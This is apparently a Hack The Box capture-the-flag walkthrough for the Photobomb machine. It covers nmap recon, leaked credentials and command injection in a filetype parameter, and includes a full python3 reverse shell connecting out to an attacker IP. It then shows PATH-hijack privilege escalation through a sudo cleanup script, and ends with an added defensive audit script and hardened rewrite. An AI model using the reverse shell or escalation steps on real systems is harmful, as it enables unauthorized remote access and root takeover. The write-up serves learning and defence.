[HTB] : Photobomb Walkthrough

Initial Recon
nmap -A -Pn photobomb.htb -T5 -oN init.txt
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp closed ftp
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
25/tcp closed smtp
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Photobomb
110/tcp closed pop3
111/tcp closed rpcbind
139/tcp closed netbios-ssn
995/tcp closed pop3s
8080/tcp closed http-proxy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 652.81 seconds
We can see that a web server is running on port 80. There is a path /printer protected with Basic Auth. If we inspect the source code of the website, we can see credentials disclosed in the /photobomb.js file.


The application allows the user to download images from the web server at a user-requested size. Intercepting the request during image retrieval, we can see the following request being sent.

I found that the filetype parameter is vulnerable to blind command injection, so we can get a reverse shell through it. The standard bash reverse shell didn't work, so I used the following python3 reverse shell.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.89",1338));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


We can see that the user wizard is allowed to run /opt/cleanup.sh via sudo.

wizard@photobomb:/tmp$ cat /opt/cleanup.sh
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
Here we can see that the script calls the find command by its bare name, so it is resolved through PATH rather than an absolute path. We can therefore create our own find executable, change the PATH variable and gain root privileges when the script is executed.
echo bash > find && chmod +x find
Now, if we change the PATH variable and execute the script, we become the root user.
sudo PATH=$PWD:$PATH /opt/cleanup.sh
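From the defender's side, here is an added example that is not part of the original write-up: a small POSIX shell audit that flags which commands a sudo-runnable script resolves through PATH, run against a constructed copy of the cleanup.sh above and against a hardened version that pins PATH and calls find and chown by absolute path. The function names and the token-scan heuristic are my own.

```shell
# Constructed copy of /opt/cleanup.sh as shown in the write-up (weak: find is resolved via PATH).
make_weak_script() {
  cat > "$1" <<'EOF'
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
EOF
}
# Hardened form (my own rewrite): pin PATH first, drop the sourced .bashrc, and call every
# external tool by absolute path, so the caller's environment cannot decide which "find" runs.
make_hard_script() {
  cat > "$1" <<'EOF'
#!/bin/bash
PATH=/usr/sbin:/usr/bin:/sbin:/bin
cd /home/wizard/photobomb || exit 1
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
/usr/bin/find source_images -type f -name '*.jpg' -exec /usr/bin/chown root:root {} \;
EOF
}
# Audit helper: print external commands in $1 that sit in command position
# without an absolute path (heuristic token scan, not a full shell parser).
relative_cmds() {
  awk '
    BEGIN { n = split("cd exit export set unset echo . fi done else esac", b, " ")
            for (i = 1; i <= n; i++) builtin[b[i]] = 1 }
    /^[ \t]*#/ { next }
    { expect = 1
      for (i = 1; i <= NF; i++) {
        t = $i
        if (t == "|" || t == "&&" || t == "||" || t == ";" || t == "!" || t == "-exec" || t == "if" || t == "then" || t == "do") { expect = 1; continue }
        if (!expect) continue
        expect = 0
        if (t ~ /^\// || t ~ /^[A-Za-z_][A-Za-z0-9_]*=/ || t == "[" || (t in builtin)) continue
        print t
      } }' "$1" | sort -u
}
weak=$(mktemp); hard=$(mktemp); make_weak_script "$weak"; make_hard_script "$hard"
echo "original resolves via PATH: $(relative_cmds "$weak" | tr '\n' ' ')"
echo "hardened resolves via PATH: $(relative_cmds "$hard" | tr '\n' ' ')"
rm -f "$weak" "$hard"
```

The original script is flagged for find and chown (the latter reached through -exec), while the hardened copy produces no findings.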
